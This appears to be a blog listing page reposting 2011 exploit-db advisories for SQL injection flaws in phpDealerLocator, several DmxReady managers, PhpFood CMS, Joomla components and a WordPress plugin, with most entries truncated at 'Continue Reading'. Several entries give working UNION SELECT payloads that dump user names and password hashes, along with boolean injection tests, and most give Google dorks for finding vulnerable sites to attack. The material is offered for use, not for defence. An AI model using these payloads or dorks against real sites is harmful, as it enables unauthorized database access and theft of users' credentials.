Tag: injection

phpDealerLocator Multiple SQL Injection Vulnerabilities

by little_oak

# Exploit Title: phpDealerLocator – Multiple SQL Injection vulnerabilities # Date: 7/3/2011 # Author: Robert Cooper (admin[at]websiteauditing.org) # Software Link: phpdealerlocator.yourphppro.com # Tested on: [Linux/Windows 7] #Vulnerable Parameters: record.php?Dealer_ID= record_country.php?Dealer_ID= results_latlong.php?s_Latitude= results_latlong.php?s_Longitude= results_latlong.php?s_Dealer_Radius= results_phone.php?s_Dealer_Radius= results_radius.php?s_Dealer_Radius= ############################################################## PoC: http://www.example.com/Locator/record.php?Dealer_ID=00000026 union all select 1,2,3,4,5,group_concat(Users_Name,0x3a,Users_Password,0x0a),7,8 FROM users– ############################################################## www.websiteauditing.org www.areyousecure.net # Shouts to the Belegit crew Fonte: http://www.exploit-db.com/exploits/17477/

Continue Reading

DmxReady Faqs Manager v1.2 SQL Injection Vulnerability e OUTROS EXPLOITS

by little_oak

DmxReady Faqs Manager v1.2 SQL Injection Vulnerability # Exploit Title: DmxReady Faqs Manager v1.2 SQL Injection Vulnerability # Google Dork: inurl:inc_faqsmanager.asp # Date: 03.07.2011 # Author: Bellatrix # Software Link: http://www.dmxready.com/?product=faqs-manager-v1 # Version: v1.2 #Language: ASP # Price : $99.97 # Tested on: Windows XP Sp3 # Greetz : VoLqaN , Toprak and All Cyber-Warrior …

Continue Reading

DmxReady Document Library Manager v1.2 SQL Injection Vulnerability

by little_oak

# Exploit Title: DmxReady Document Library Manager v1.2 SQL Injection Vulnerability # Google Dork: inurl:inc_documentlibrarymanager.asp # Date: 03.07.2011 # Author: Bellatrix # Software Link: http://www.dmxready.com/?product=document-library-manager # Version: v1.2 #Language: ASP # Price : $99.97 # Tested on: Windows XP Sp3 # Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members…. —————————————————————————————————- Bug; http://target/path/admin/DocumentLibraryManager/update.asp?ItemID=xx [ …

Continue Reading

DMXReady Account List Manager v1.2 SQL Injection Vulnerability

by little_oak

# Exploit Title: DMXReady Account List Manager v1.2 SQL Injection Vulnerability # Google Dork: inurl:inc_billboardmanager_summary_popup.asp # Date: 03.07.2011 # Author: Bellatrix # Software Link: http://www.dmxready.com/?product=account-list-manager # Version: v1.2 #Language: ASP # Price : $99.97 #Demo : http://demo.dmxready.com/applications/AccountListManager/inc_accountlistmanager.asp # Tested on: Windows XP Sp3 # Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members…. ————————————————————————————————— …

Continue Reading

PhpFood CMS v2.00 SQL Injection Vulnerability

by little_oak

############################################################################################################# ## PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability ## ## Author : kaMtiEz ([email protected]) ## ## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ## ## Date : 3 July, 2011 ## ############################################################################################################# [ Software Information ] [+] Vendor : http://www.phpfood.com/ [+] Download : http://www.phpfood.com/download.html [+] version : 2.00 or lower maybe also affected [+] Vulnerability …

Continue Reading

Joomla Component (com_team) SQL Injection Vulnerability

by little_oak

******************************************************************************** Joomla Component (com_team) SQL Injection Vulnerability ******************************************************************************** Author : CoBRa_21 Dork : inurl:com_team ******************************************************************************** Exploit http://localhost/[PATH]/print.php?task=person&id=36 and 1=1 http://localhost/[PATH]/print.php?task=person&id=36 and 1=2 http://localhost/[PATH]/print.php?task=person&id=36 [SQL] ******************************************************************************** Ordu-yu Lojistik TIM // CoBRa_21 ******************************************************************************** Fonte: http://www.exploit-db.com/exploits/17412/

Continue Reading

WordPress Events Manager Extended Plugin SQL Injection Vulnerability

by little_oak

———————————————————————— # WordPress Events Manager Extended Plugin Persistent SQL Vulnerability ———————————————————————— # SoftwareLink: http://wordpress.org/extend/plugins/events-manager-extended/ # Version     : 3.1.2 # Author      : LoocK3D # Date        : 11 June , 2011 ———————————————————————— [-] Dork            ; inurl:wp-admin/admin.php?page= [-] Vulnerable File ; /wp-admin/admin.php?page=people&action=printable&event_id=[SQL] [-] Exploit         ; -1+union+select+0,1,2,concat_ws(user_login,0x3a,user_pass)UAHCrew,4+from+db_unx_users– ———————————————————————— # UAHCrew Member : Hackeri-AL – LoocK3D – b4cKd00r ~ # …

Continue Reading

Joomla Component com_joomnik SQL Injection Vulnerability

by little_oak

  <——————- header data start ——————- > ############################################################# Joomla Component Joomnik Gallery SQL Injection Vulnerability ############################################################# # Author : SOLVER ~ Bug Researchers # Date : 26.05.2011 # Greetz : DreamPower – CWKOMANDO – Toprak – Equ – Err0r – 10line # Name : Joomla com_joomnik # Bug Type : SQL injection # Infection : …

Continue Reading